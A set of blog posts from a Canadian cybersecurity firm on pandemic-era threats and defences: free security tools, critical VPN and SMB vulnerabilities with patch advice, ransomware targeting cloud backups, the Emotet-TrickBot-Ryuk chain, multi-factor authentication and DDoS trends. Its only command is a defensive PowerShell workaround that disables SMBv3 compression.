Thought leadership. threat analysis, news and alerts.
The Definitive Guide to Free Cybersecurity Resources During COVID-19 Pandemic
COVID-19 has transformed the world in a matter of weeks. Many people now work from home for the first time, relying on the latest tools to connect with their employers, colleagues, and clients.
Sadly, cybercriminals are still exploiting weaknesses and targeting vulnerable people with scams. Fake government websites and messages have been reported, tricking users searching for official information in a time of profound unease.
As more people are cut off from their usual working environments, they may be unsure how to stay safe online. Fortunately, Canadian businesses can take advantage of free cybersecurity resources and defend themselves during the COVID-19 crisis.
In this guide, we explore the most valuable websites and tools available right now.
Cybersecurity Informational Resources for Businesses
Employees who are new to working from home can struggle to adapt to monitoring their own cybersecurity and taking effective precautions. The first step is to read the right information.
Canadian businesses looking to protect their infrastructure and employees during the COVID-19 upheaval can share the following resources with their teams to help them safeguard their own hardware and software at home:
Canadian Anti-Fraud Centre
This may have been your first port of call, but if not, the Canadian Anti-Fraud Centre is packed with helpful insights.
For example, there’s an in-depth list of reported scams to be aware of, including people posing as charities, cleaning companies, the Public Health Agency of Canada, Red Cross, and government departments. Check the list regularly to stay up to date on the latest scams.
It also provides tips on how to protect yourself and your business against online dangers. It’s never been more important to stay vigilant.
Canadian Centre for Cyber Security
The Canadian Centre for Cyber Security is another crucial resource for businesses. It features a fantastic guide — ‘Staying cyber-healthy during COVID-19 isolation’ — which links to several eye-opening articles on phishing, spotting malicious emails, and updating software & devices to mitigate risks.
National Institute of Standards and Technology (NIST)
NIST operates an outstanding Small Business Cybersecurity Corner, covering everything from Cybersecurity Resources Roadmaps to Cybersecurity Framework Steps for Small Manufacturers.
There’s a Telework Cybersecurity section with lots of resources for teams working from home, exploring such critical topics as Telework Security Basics and Mobile Device Security.
Cybersecurity News Updates
Businesses across Canada should try to stay well-informed on cybersecurity dangers and scams. The following sites are posting regular updates:
Free Cybersecurity Tools
Antivirus brand Sophos is offering free cybersecurity software for professional and personal use.
For as long as the COVID-19 crisis lasts, Sophos customers have free access to Sophos Home Commercial Edition program, which delivers business-grade defense for all users.
On top of this, Sophos’ XG Firewall is available with a 90-day free trial. This provides automatic threat isolation and insights into hidden threats.
Click Armor is a Canadian security platform, and its “Can I Be Phished?” tool is a handy resource for all businesses and remote workers. It’s a user-friendly three-minute assessment designed to identify your ability to recognize phishing emails.
This invites users to choose emails they believe are suspicious, such as falsified HR policy updates, news alerts, and more. It may help employers and employees alike develop a stronger eye for spotting dangerous emails lurking in inboxes.
Qualys is providing Remote Endpoint Protection for remote workers. This is in response to the increased number of people now doing their jobs from home and is free for 60 days.
This gives users real-time visibility on all major weaknesses and issues (such as misconfigurations) that could put devices at risk.
DomainTools has built a free list of websites considered high-risk during the COVID-19 crisis, helping businesses to protect their systems, workers, and data against cybercriminals.
This tool provides access to the list after a brief registration process. The keyword-based, streamlined search function makes finding problem sites fast.
Users also can see when high-threat domains were created and the level of risk they pose (represented as a score for at-a-glance insights). The list includes tens of thousands of sites so far.
Canadian cybersecurity company 1Password has adjusted the pricing on its 1Password Business package, so that companies can now get their first six months’ usership for free (instead of just 30 days). The company discussed its reasons for making the change in this blog post.
This tool enables businesses to centralize their login details in one space, with no need to memorize them or write them in notebooks which could go missing. Remote workers can access their business logins securely, increasing safety and reducing the amount of time they could waste by forgetting or misplacing their passwords.
Networking company Cisco is allowing its Cisco Umbrella customers to exceed their user limit for free, to accommodate the increase in employees working from home. Newcomers also have access to a free license, not just existing users.
Cisco’s offer applies to Duo Security, too, which is a two-factor authentication tool. It can be integrated into mobile or web apps, and prompts users to confirm their identity when trying to login.
Cisco AnyConnect Secure Mobility Client is also included in the offer, which runs until July 1, 2020.
These are trying times for businesses of all sizes, but the strain may be particularly tough for smaller companies with tighter budgets. Taking advantage of these free cybersecurity resources and tools can help you stay safe online, even when cybercriminals are at their most ruthless.
At The Driz Group, we continue to provide our customers with cutting-edge managed services to prevent cyberattacks and protect applications. Schedule a free consultation to discuss your business’s cybersecurity options now.
Cybersecurity Risks Posed by COVID-19 Pandemic
The Canadian Centre for Cyber Security has warned that the COVID-19 pandemic poses an elevated level of risk to the cyber security of Canadian organizations involved in the response to the pandemic.
In a recently released alert, the Canadian Centre for Cyber Security said that the COVID-19 pandemic presents an elevated level of risk to cyber security, not just to the organizations in the medical and health sector but also to other Canadian businesses, particularly those with employees teleworking through VPNs. The Cyber Centre recommends that these high-risk organizations remain vigilant and take the time to ensure that they’re engaged in cyber defense best practices.
According to the Canadian Centre for Cyber Security, high-risk organizations should engage in cyber defence best practices in fighting against sophisticated threat actors and ransomware.
1. Sophisticated Threat Actors
The Cyber Centre said that sophisticated threat actors may target Canadian organizations involved in supporting the country’s response to the COVID-19 pandemic, which include organizations within the medical research community. The Cyber Centre said these sophisticated threat actors may attempt to steal data relating to the response to the pandemic, including ongoing key research towards a vaccine or other medical remedies, or other topics of interest to the threat actors.
Ransomware is a type of malicious software (malware) that encrypts victims’ computers or files, thereby locking out legitimate users and forcing the victims to pay ransom in exchange for the decryption keys that would unlock the computers or files.
According to the Canadian Centre for Cyber Security, the impact of a ransomware attack on Canadian organizations involved in supporting Canada’s response to the COVID-19 pandemic could be more devastating during the current pandemic than if it were to occur in a non-pandemic environment. Cyber criminals, the Cyber Centre said, may take advantage of the COVID-19 pandemic, exploiting the increased pressure being placed on Canadian health organizations to extract ransom payments.
Preventive and Mitigating Measures Against Cyber Threats Arising from the COVID-19 Pandemic
Here are some of the preventive and mitigating measures or cyber security best practices in these trying times:
Stay Aware of COVID-19 Phishing Campaigns
As of March 28, 2020, the Government of Canada reported 5,386 confirmed COVID-19 cases and 60 confirmed deaths. Globally, the World Health Organization (WHO) as of March 28, 2020 reported 571, 678 confirmed COVID-19 cases and 26,494 confirmed deaths.
As this pandemic unfolds, people are hungry for information and cyber criminals are taking advantage by launching phishing campaigns – cyber-attacks that weaponized emails. In phishing campaigns, victims are tricked into opening emails that masquerade as coming from legitimate sources. These malicious emails are in fact, laden with malicious links or malicious attachments that once clicked could install malware, including ransomware.
Increase Compromise Monitoring
High-risk organizations should exercise increase monitoring in order to detect attempted compromises by sophisticated threat actors or ransomware attackers.
Employees who are now working from home as a result of COVID-19 pandemic put a strain on your organization’s network. It’s important to monitor logs for malicious activity.
Follow the 3-2-1 Rule of Backups
3: Stands for keeping 3 copies of any important file: 1 primary and 2 backups.
2: Stands for keeping the files on 2 different media types to protect against different types of hazards.
1: Stands for storing 1 copy offsite that’s outside the organization’s facility.
Apply Patch to Critical Vulnerabilities
According to the Canadian Centre for Cyber Security, critical security vulnerabilities related to telework, also known as remote work, are of particular concern during the COVID-19 pandemic. As organizations rush to make more infrastructure available to remote users, such as virtual private network (VPN), unpatched software may be deployed, the Canadian Centre for Cyber Security said.
Over the past year, multiple critical vulnerabilities in VPN devices have been identified. Multiple successful exploitations of these critical vulnerabilities in VPN devices have also been reported, leading the Canadian Centre for Cyber Security to assess that these same VPN critical vulnerabilities “are likely to be leveraged for renewed compromise attempts over the short term”.
The Cyber Centre added that the critical security vulnerabilities listed below are among those that are likely to be targeted by malicious actors:
- CVE-2019-0708: This security vulnerability in Remote Desktop Services allows an attacker to execute arbitrary code on the affected Windows operating systems, enabling an attacker to install programs; view, change, or delete data; or create new accounts with full user rights.
- CVE-2019-19781: This security vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway could be exploited through a directory traversal attack against the /vpn directory of a vulnerable system.
- CVE-2020-0688: This remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.
- CVE-2020-0796: This remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploits this critical vulnerability could gain the ability to execute code on the target server or client.
- CVE-2020-1938: This critical security vulnerability in Apache Tomcat could allow attackers to access the Apache JServ Protocol (AJP) port by bypassing security checks based on client IP address and by bypassing user authentication if Tomcat was configured to trust authentication data provided by the reverse proxy.
It’s important to apply as soon as possible the available security patches and mitigating measures for the above-mentioned critical security vulnerabilities.
When you need help or looking for cybersecurity advice, to help Canadian businesses stay safe, The Driz Group will provide complimentary cybersecurity advisory services and resources during the COVID-19 pandemic.
How to Facilitate Secure Remote Work Arrangements
The Government of Canada, in an effort to contain and prevent further spread of the new coronavirus disease (COVID-19), has urged all Canadians to stay home and practice social distancing. In the work environment, this means that Canadian businesses are urged to facilitate “remote work arrangements”.
The World Health Organization (WHO) on March 11, 2020 assessed COVID-19 as a pandemic. As of March 21, 2020, the Government of Canada reported 1,231 confirmed cases of COVID-19 in Canada, with 13 deaths. Worldwide, as of March 22, 2020, WHO reported 267,013 confirmed cases of COVID-19 and 11,201 deaths in 185 countries or territories.
“During this extraordinary time, the Government of Canada is taking strong action to help Canadian businesses as COVID-19 is affecting them, their employees and their families,” the Government of Canada said. The Government has urged all Canadians to stay home unless it is absolutely essential to go out, and to practice social distancing and good hygiene. “For businesses, this means facilitating flexible and remote work arrangements,” the Government said.
What Is Remote Work Arrangement?
Remote work arrangement allows workers to work from home whenever and wherever possible. This arrangement limits the number of workers on-site, thereby contributing to the efforts to contain the COVID-19 outbreak and prevent further spread.
Remote work, also known as telework, is nothing new. While remote work has been adopted by some sectors, this hasn’t achieved wide adoption.
Based on the 2016 data from Canada’s General Social Survey (GSS), 2.3 million paid workers or 12.7% of the total workforce of Canada telework at least an hour a week. Out of the 2.3 million Canadians that telework, more than 500,000 workers work for more than 15 hours per week.
According to the 2016 GSS data, remote work in Canada is associated with occupations that are most connected to the knowledge economy, with 36% of workers in the management sector, 24.3% in the education sector and 21.7% in nature and applied science sector telework.
The sudden shift from office work to remote work arrangement as a way to contain and prevent further spread of COVID-19 has caught many employers and employees off guard.
Remote Work Challenges
In a remote work arrangement, there are 2 things that need protection: the devices (those used by the remote workers and those used by remote employers) and the communication link.
One of the challenges of remote work in light of the COVID-19 outbreak is the fact that many organizations are forced to allow their staff to use their personal desktops, laptops or mobile devices as organizations have been unprepared to issue official or organization-owned devices.
Allowing staff to use their personal computers is, in itself, a security issue. Some of the security issues arising from the use of personal computers include:
Organizations offering remote work arrangements are similarly faced with the same device security challenge. Organizations’ devices are at risk of unauthorized access from malicious insiders to malicious outsiders. Outdated computers, such as outdated server operating system, also pose a security threat not just to the organization concerned but also to remote workers allowed to remotely access the organizations’ devices.
Best Practices in Facilitating Secure Remote Work Arrangement
Here are some of the best practices in facilitating secure remote work arrangement:
1. Practice Network Segmentation
Network segmentation refers to the practice of dividing your organization’s network into sub-networks. This practice ensures that in case one sub-network is compromised, the other sub-networks won’t be affected.
For the security of your organization’s network, it’s important to prevent non-IT remote workers from accessing your organization’s network.
For IT remote workers, network segmentation is specifically important. The negligence or malicious actions, for instance, of one remote worker who has access to a certain sub-network, won’t affect the other sub-networks especially those sub-networks that are critical to the operation of your organization.
2. Use VPN
VPN, short for virtual private network, acts as a secure tunnel between two endpoints: the remote worker’s device and your organization’s server. For example, a remote worker can use this VPN to send encrypted data to your organization’s server.
It’s important to use multi-factor authentication for all VPN connections. Multi-factor authentication for all VPN connections is particularly important as login credentials (VPN usernames and passwords) are sought after by cyber criminals. VPN login credentials are often stolen via phishing campaigns – campaigns that trick remote workers to click on malicious links or attachments contained in malicious emails that masquerade as coming from legitimate sources.
Clicking on these malicious links or attachments could lead to the downloading on the remote worker’s device of a malware that steals VPN login details. The use of multi-factor authentication in all VPN connections renders the theft of login details useless.
3. Keep All Devices Up to Date
Always keep your organization’s devices up to date by using devices that receive regular security updates, and by applying security updates in a timely manner. Applying security updates on server operating systems and VPNs should be the top priority.
Vulnerabilities in server operating systems and VPNs have in the past been exploited by malicious actors as these two are seen as gateways to victims’ networks.
On behalf of all staff we wish you and your families well. During these challenging times, we are ready to help those who needs assistance with minimizing IT and cybersecurity risks.
Need a few working remotely tips? Here are a few work from home productivity tips from our management team:
1. Dress for success
Even though you are working from home, always dress as if you were going to work. We found that it helps to set a proper mood and help motivation and demeanor.
2. Find a quite spot
Kids and pets are fun, and you need to be 100% focused on the task at hand to be productive. Every minute of distraction may set you back an hour.
3. Plan your day
Plan as if you were in the office. Keep your calendar up to date and let your co-workers know when you are available and when you are not to avoid scheduling conflicts.
4. Take breaks
Coffee breaks, and lunch are a must to stay rested and sharp. Even when you are working from home, your brain and your eyes still need rest.
5. Don’t check email
Well, most of us must check email, and we recommend checking your email twice a day to get more done. After all, if you are getting back to people the same day, it’s more than acceptable. If something is truly urgent, people will call you.
6. No social media
At least during business hours. Unless browsing social media is a part of your job, keep your mind focused and get more done.
Find the right apps and tools for your particular industry and spend the time automating as many menial tasks as possible. Many tools are free to use or cost very little yet save you a lot of time. If you don’t value your own time, no one else will.
Looking for cybersecurity and IT risk advice? Contact us today to speak with a cybersecurity expert. We offer complimentary advisory services to Canadian businesses of all sizes during the COVID-19 pandemic so that you and your organization remain safe.
How to Block Malicious SMB Traffic from Entering or Leaving Your Organization’s Network
In recent years, vulnerabilities in SMB, short for Server Message Block, have been exploited by attackers in entering or leaving their victims’ networks.
What Is SMB?
SMB is a network file sharing and data architecture protocol that’s used by major operating systems such as Windows, MacOS and Linux. A client – referring to a computer used to access a server through a network – uses SMB to access data on a server. A server – referring to a computer that stores a wide variety of files such as application and data files – uses SMB for workloads like clustering and replication.
SMB was originally developed in the 80s by IBM. Microsoft adopted this protocol but made considerable modifications. Microsoft’s SMB protocol has since undergone 3 versions: Server Message Block (SMB) version 1 (SMBv1), SMB version 2 (SMBv2), and SMB version 3 (SMBv3).
The SMBv2 protocol was introduced in Windows Vista and Windows Server 2008, while the SMBv3 protocol was introduced in Windows 8 and Windows Server 2012. Microsoft publicly deprecated the SMBv1 protocol in 2014.
SMBv1 Security Vulnerability
Ned Pyle of Microsoft described SMBv1 as much like the 80s original version, that is, for a world that no longer exists – “a world without malicious actors, without vast sets of important data, without near-universal computer usage”.
According to Pyle, key protections offered by later SMB protocol versions aren’t found in SMBv1, including the following:
On March 14, 2017, Microsoft issued a security update, also known as a patch, fixing the vulnerability in SMBv1. According to Microsoft, this vulnerability could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.
Nearly 2 months after the release of the patch for SMBv1, on May 12, 2017, the WannaCry malicious software (malware) infected hundreds of thousands of computers worldwide. The group behind WannaCry exploited the security vulnerability in SMBv1.
SMBv3 Security Vulnerability
Last March 12, Microsoft issued a patch for a security vulnerability in SMBv3. According to Microsoft, this security vulnerability, referred to as CVE-2020-0796, could allow an attacker to gain the ability to execute code on the target SMB server or SMB client.
Microsoft said that in order to exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against an SMB Client, meanwhile, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.
CVE-2020-0796 vulnerability exists in a new feature that was added to Windows 10 version 1903, including the following versions:
Cybersecurity Best Practices in Blocking Malicious SMB Traffic
Keeping your operating systems up to date and using only supported operating systems are two of the effective measures in blocking malicious SMB traffic.
In the case of the WannaCry attack, many of the infected computers failed to apply Microsoft’s March 14, 2017 security update. It’s, therefore, important to keep your operating system up to date.
Other victims of the WannaCry attack were unsupported computers – those that no longer received security updates as these computers already reached their end of life or end of support. It’s important to only use operating systems that receive regular security updates or those that still haven’t reached their end of life.
The high number of WannaCry victims showed that high number of Windows operating system users had used unsupported operating systems and hadn’t installed Microsoft’s March 14, 2017 security update.
For the SMBv3 security vulnerability CVE-2020-0796, Microsoft recommends the following mitigating measures:
According to Microsoft, blocking TCP port 445 at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit CVE-2020-0796 vulnerability. This mitigating measure helps avoid internet-based attacks – those that originate outside the enterprise perimeter. Failure, however, to apply Microsoft’s March 12, 2020 security update could still leave vulnerable systems to attacks from within their enterprise perimeter.
One workaround for CVE-2020-0796 vulnerability, especially for organizations that can’t immediately apply the March 12, 2020 security update due to operational reasons is by disabling SMBv3 compression.
Disabling SMBv3 compression blocks unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below.
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
Microsoft, however, warned that disabling SMBv3 compression doesn’t prevent the exploitation of SMB clients.
How to Strengthen Cloud Backups Against Ransomware
Cloud backup is an important defense against ransomware attacks. Cloud backups, however, have recently been the target by ransomware attackers.
In a ransomware attack, the computer or the data within is encrypted preventing users’ access to this computer or data. The lack of backups forces many victims to pay ransom in exchange for the decryption keys that would unlock these locked computers or locked data.
As many organizations have migrated their daily operations to the cloud, many have migrated their backups to the cloud as well. For many organizations, cloud backups have given them a false sense of security.
If not configured properly, cloud backups could easily be stolen, deleted and, in a worst-case scenario, used against your organization. The group behind the ransomware called “DoppelPaymer” recently published on their leak website the admin username and password for a Veeam user account owned by one of DoppelPaymer ransomware’s victims who refused to pay ransom.
Switzerland-based Veeam is a software company that develops cloud backup software. DoppelPaymer is the latest addition to the number of ransomware programs that establish leak websites to shame victims who refuse to pay ransom. Stolen data belonging to the victims prior to encryption are published on these leak websites.
"Cloud backups are a very good option against ransom but do not 100% protect as cloud backups are not always good configured, offline backups often outdated – the system of backups is really nice but human factor leaves some options," the group behind DoppelPaymertold Bleeping Computer.
How Cybercriminals Compromise Cloud Backups
Ransomware attackers often initially compromise victims’ computers through phishing campaigns or exposed RDP. In phishing campaigns, attackers trick victims in opening malicious emails containing malicious links or attachments. Opening these malicious links or attachments could lead to the downloading of the actual ransomware into the victims’ computers.
Exposed RDP is another gateway of ransomware attacker to the victims’ networks. RDP, short for remote desktop protocol, is a protocol developed by Microsoft that provides a user with a graphical interface to connect to another computer over a network connection. Exposed RDP, those that used weak passwords and are without multi-factor authentication, virtual private networks (VPNs), and other security measures, are targeted by cybercriminals as an initial entry point to gain access to their victims’ networks.
The group behind the ransomware called “Maze” told Bleeping Computer that cloud backups credentials are used to restore the victims’ data stored in the cloud to the servers under the group’s control. Maze ransomware started the trend among ransomware operators in establishing leak websites in order to shame victims who refuse to pay ransom.
"Yes, we download them [data stored in the cloud],” the group behind Maze ransomware told Bleeping Computer. “It is very useful. No need to search for sensitive information, it is definitely contained in backups. If backups in the cloud it is even easier, you just login to cloud and download it from your server, full invisibility to data breach detection software.”
Operators of the DoppelPaymer and Maze ransomware, however, didn’t elaborate to Bleeping Computer how they were able to gain access to their victims’ cloud backups. In the case of users using the Veeam software for cloud backups, the role of Mimikatz and configuring Veeam to use Windows authentication could have led to the compromise of these cloud backups.
Once malicious actors gain access to their victims’ networks, they systematically move through the network, for instance, via the use of Mimikatz – an open-source application that allows attackers to view and save Windows authentication credentials. These stolen Windows authentication credentials are used by the attackers in accessing cloud backups that use the Veeam software as some administrators configure Veeam to use Windows authentication.
Cybersecurity Best Practices in Securing Your Organization’s Cloud Backups
In a white paper released by Veeam, the company said that one of the best practices in securing your organization’s cloud backups is through the use of different credentials for cloud backups. “One of the key characteristics of ransomware is its ability to propagate,” Veeam said. “By using different credentials within the Veeam infrastructure, we can introduce more resiliency by limiting propagation from other operating systems on the network. The best, broadest recommendation is to have at least two credential mechanisms in use. That can include both Windows and Linux accounts, Windows and Veeam Cloud Connect, etc.”
It’s also important to follow the time-tested 3-2-1 rule:
3: Keep 3 copies of any important file: 1 primary and 2 backups.
2: Keep the files on 2 different media types to protect against different types of hazards.
1: Store 1 copy offsite (for example, cloud backup).
Following the 3-2-1 rule, aside from cloud backup, it’s also important to keep a backup on-premise or on-site. This on-premise backup must be kept offline to ward off ransomware attackers. Aside from attacking cloud backups, ransomware attackers have targeted on-premise backups exposed to the internet.
In the past few months, ransomware attackers have targeted Network Attached Storage (NAS) devices. NAS is a storage and backup system that consists of one or more hard drives.
To gain access to NAS devices, attackers use brute force attack, that is, guessing through trial-and-error the correct username and password combination. To gain access to NAS devices, attackers also exploit security vulnerabilities that remained unpatched either through an absence of a vendor’s security update or failure of a NAS device user in installing in a timely manner the vendor’s available security update.
When you need help securing your cloud backups and applications against ransomware attacks, our experts are here to help. Get in touch with us today and protect your valuable assets.
Why Single Factor Authentication Isn’t Enough to Protect Your Organization’s Network
Many of today’s cyberattacks have been successful, not because of advanced technology but because of one often ignored fact: the use of single factor authentication.
What Is Single Factor Authentication?
Single factor authentication is a cybersecurity measure that relies on the use of a username and password pair. While single factor authentication is commonly used in emails, this cybersecurity measure is also common as a perceived defensive measure in protecting endpoints – devices such as desktops and laptops that connect to a computer network and communicates back and forth with the network resources.
RDP Brute-Force Attacks
Single factor authentication has surprisingly been used as a defensive measure in protecting RDP, short for remote desktop protocol. RDP, a proprietary protocol developed by Microsoft, provides users with a graphical interface to connect to another computer over a network connection. In brute-forcing an RDP, a malicious actor attempts to sign in to an RDP with an administrator account by effectively guessing the correct username and password combination through a trial-and-error method. By successfully guessing the correct username and password combination, a malicious actor can gain access to a target computer and conduct further malicious activities such as stealing data, drop a ransomware or used the compromised computer for cryptocurrency mining.
In the blog post "Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks" published in December 2019, Microsoft Defender ATP Research Team reported that out of nearly 45,000 computers that had both RDP public IP connections and at least one network failed sign-in, the team found that, on average, several hundred computers per day had high probability of experiencing one or more RDP brute force attack attempts.
API Credential Stuffing Attacks
Threat actors also exploit the use of a single factor authentication in gaining access to the victims’ IT infrastructure such as cloud server through credential stuffing attacks. In a credential stuffing attack, an attacker uses the single factor authentication credentials stolen from other data breaches.
The difference between credential stuffing attack and brute force attack is that in credential stuffing attack, guesses are based on the stolen usernames and passwords, while in brute force attack, guesses have no bases at all, with some attempts using characters at random.
In the past 10 years, billions of username and password combinations have been stolen from different individuals and organizations around the globe. These stolen usernames and passwords are publicly made available online, while others are sold online on the dark web.
Haveibeenpwned, a site that allows internet users to check whether their personal data has been compromised by data breaches has within its records millions of user accounts. In April 2019, the group known as “GnosticPlayers” released online breached records of nearly one billion users, including usernames and passwords.
While the success rate of credential stuffing attacks is only about 0.1% – which means that for every 1,000 attempts, roughly only one will succeed, the sheer volume of stolen single authentication credentials makes credential stuffing worth it. The success rate of 0.1%, for instance, for one million attempts could lead to nearly 1,000 successful cracked accounts.
APIs, short for application programming interfaces, are favourite targets by malicious actors in their credential stuffing attacks. An API allows two systems to communicate with one another. APIs allow easy access to a third-party platform, for instance, cloud storage. From December 2017 to November 2019, Akamai reported that it observed nearly 85.5 billion credential stuffing attacks across its customer base. Out of the 85.5 billion credential stuffing attacks, Akamai said 16.5 billion of these attacks were directed against hostnames that were clearly identified as API endpoints – referring to one end of a communication channel such as a URL of a server.
Brute force attackers and credential stuffing attackers are unstoppable because systems allow users to guess as many username and password combinations without limit. While some mitigate these two types of attacks through throttling, attackers bypass throttling by staging a low and slow approach.
Akamai reported that credential stuffing attackers take advantage of the unlimited guesses by guessing tens of thousands of credentials in minutes. Microsoft Defender ATP Research Team, meanwhile, reported that RDP brute force attacks often last for 2-3 days on average, with about 90% of cases lasting for 1 week or less, and less than 5% lasting for 2 weeks or more.
Cybercriminals are able to launch millions of these brute force and credential stuffing attacks in just a short span of time through the use of internet bots – referring to software applications that run automated tasks over the internet. To automate brute force or credential stuffing attacks, botnets are used by attackers. Botnets refer to a group of hijacked computers and controlled by cybercriminals to conduct malicious activities such as brute force attacks, credential stuffing attacks and distributed denial-of-service (DDoS) attacks.
By utilizing botnets, attackers are able to launch several login attempts simultaneously. The use of botnets or group of hijacked computers makes it appear that the login attempts come from different computers from different locations. Some botnets hijacked a few thousands and some hijacked millions of computers. The use of botnets bypasses security measures such as banning IP addresses with too many failed logins.
The use of multi-factor authentication effectively blocks brute force and credential stuffing attacks. In multi-factor authentication, aside from the correct username and password combination, a user is asked to provide additional information such as access token, face ID or a fingerprint – generally, things that bots can’t provide.
While we always recommend a multi-factor authentication, in many cases, businesses don’t evaluate basic IT controls and fall victim to cyberattacks.
Connect with us today and our team will evaluate your IT controls to ensure that decision makers understand the business impact and clearly understand what they need to focus on, both long and short-term.
Growing Threat of Ransomware Reinfection
Switzerland's cybersecurity body, the Reporting and Analysis Centre for Information Assurance (MELANI), has cautioned local SMEs and large organizations against paying ransomware attackers due to the risk of ransomware reinfection.
In a recent advisory to local organizations in Switzerland, MELANI said it’s aware of cases in Switzerland and abroad where the same organizations have been victims of ransomware attacks several times within a very short period of time. Ransomware is a type of malicious software (malware) that encrypts victims’ files and forces victims to pay ransom in exchange for the decryption keys that would unlock the encrypted files.
According to MELANI, even if a ransom is paid, there’s no guarantee that the ransomware attacker will decrypt the data. Switzerland's cybersecurity body also cautioned that even when ransom payment is made, leading to the decryption of the encrypted data, the underlying infection of some ransomware will remain active. “As a result, the attackers still have full access to the affected company's network and can, for example, reinstall ransomware,” MELANI said.
Emotet and TrickBot are two of the malware cited by Switzerland's cybersecurity body that could cause ransomware reinfection on victims’ computers even after ransom payment and after decryption.
In October 2019, the Canadian Centre for Cyber Security issued an alert to organizations in Canada about the 3-in-1 infection process involving 3 malware: Emotet, TrickBot and Ryuk. According to the Canadian Centre for Cyber Security, Emotet, TrickBot and Ryuk ransomware are part of the 3-stage infection process, with Emotet as the first malware downloaded, TrickBot as the second malware downloaded, and Ryuk ransomware as the last malware deployed against victims’ networks by an organized and prolific actor or group of actors.
Emotet, first detected in 2014, is a malware that’s distributed through emails containing malicious links or attachments. Victims are tricked into clicking these malicious links or attachments as the group behind Emotet uses branding familiar to the recipients.
According to the US Cybersecurity and Infrastructure Security Agency, once Emotet is downloaded on the victim’s computer, this malware uses a credential enumerator in the form of a self-extracting RAR file. This credential enumerator, the US cybersecurity body said, containstwo components: a bypass component and a service component. The bypass component is used to find writable share drives using SMB or brute force (attempt to crack a password or username using a trial and error method) users’ accounts, including the administrator account.The service component, meanwhile, writes Emotet onto thecompromised computer’s disk.
SMB, short for Server Message Block, is a network protocol used by computers running Microsoft Windows that allows systems within the same network to share files. “Emotet’s access to SMB can result in the infection of entire domains (servers and clients),” US Cybersecurity and Infrastructure Security Agency said.
Once the attacker gains access on the victim’s network via Emotet, the Trickbot malware is then downloaded and distributed to the compromised systems.
Trickbot, first detected in 2016, is a malware that has similar capabilities as Emotet. Similar to Emotet, Trickbot can brute force users’ accounts and spread onto as many computers as possible using SMB.
Analysis of the Trickbot showed that this malware uses PowerShell Empire, a publicly available tool. Designed as a legitimate penetration testing tool in 2015, PowerShell Empire has become a favorite tool among the well-financed threat groups.
PowerShell Empire allows an attacker to escalate privileges, harvest credentials, exfiltrate information, and move laterally across the victim’s network. PowerShell Empire is difficult to detect on a network using traditional antivirus software as it operates almost entirely in memory, and it also uses PowerShell, a legitimate application. Empire also allows an attacker to install Ryuk ransomware on high-value targets.
According to the Canadian Centre for Cyber Security, Trickbot’s capabilities allow it “to map out the network and give the malicious actor a better understanding of the target, including the value of the data.”
Ryuk ransomware first appeared in 2018. On its own, this ransomware doesn’t have the ability to spread onto as many machines as possible within a network, hence the dependency on other malware such as Emotet and Trickbot.
“The Ryuk ransomware itself does not contain the ability to move laterally within a network, hence the reliance on access via a primary infection, but it does, however, have the ability to enumerate network shares and encrypt those it can access,” UK's National Cyber Security Centre said. “This, coupled with the ransomware’s use of anti-forensic recovery techniques (such as manipulating the virtual shadow copy), is a technique to make recovering from backups difficult.”
Preventive and Mitigating Measures Against Ransomware
Every so often malware programs such as Emotet, Trickbot and Ryuk are able to access victims’ networks as a result of ignoring basic cybersecurity measures. Here are some basic cybersecurity measures in order to protect your organization’s network against malware such as Emotet, Trickbot and Ryuk:
In the case of Ryuk infection, it’s important to note that cleaning up the affected computers isn’t enough as these “cleaned” computers could still be reinfected as the associate malware used by Ryuk, Emotet and Trickbot, could be lurking on networked systems that were not initially affected by the ransomware.
DDoS Attacks Are Getting Smaller, Shorter & More Persistent, Study Shows
A recent study released by Imperva showed that DDoS attacks are getting smaller, shorter and more persistent – a trend that shows that attackers are hoping to cause great damage before the activation of DDoS mitigating measures.
What Is DDoS Attack?
DDoS, short for distributed denial-of-service, is a type of cyber-attack in which multiple computers operate together as one to attack a target, for instance, a particular website.
Attackers typically use botnets to carry out DDoS attacks. A botnet is a group of internet-connected computers that are hijacked by malicious actors. These hijacked computers are then controlled by attackers as one “zombie army” to attack a chosen target.
There are two general types of DDoS attacks, the network layer attack and application layer attack. In network layer DDoS attacks, malicious actors “clog the pipelines” connecting to the target network, resulting in severe operational damages, such as account suspension. In application layer DDoS attacks, malicious actors flood a target application with seemingly innocent requests, resulting in high CPU and memory usage leading to the eventual hanging or crashing of the targeted application.
In network layer DDoS attack, the attack is measured by gigabits per second (Gbps) or packets per second (PPS), while in application layer DDoS attack, the attack is measured by requests per second (RPS). Most mid-sized websites can be crippled by 50 to 100 RPS application layer DDoS attacks, and most network infrastructures can be shut down by 20 to 40 Gbps network layer DDoS attacks.
Prevalence of DDoS Attacks
“Overall, we saw attacks that were smaller, shorter, and more persistent,” Imperva said in the company’s 2019 Global DDoS Threat Landscape Report. The company said that this trend “may be indicative of attackers’ attempts to wreak havoc before a mitigation service kicks in”.
Imperva reported that most DDoS attacks in 2019 were short, with 51% lasting less than 15 minutes. The report also showed that DDoS attacks in 2019 were conducted in short streaks, with two-thirds of targets attacked up to five times and a quarter of targets attacked 10 times or more.
Imperva added that while the norm of DDoS attacks in 2019 was small, the company recorded the largest network layer DDoS attack and application layer DDoS attack. The company said it recorded a network layer DDoS attack that reached 580 million packets per second (PPS), and a separate application layer DDoS attack which lasted for 13 days and peaked at 292,000 Requests Per Second (RPS).
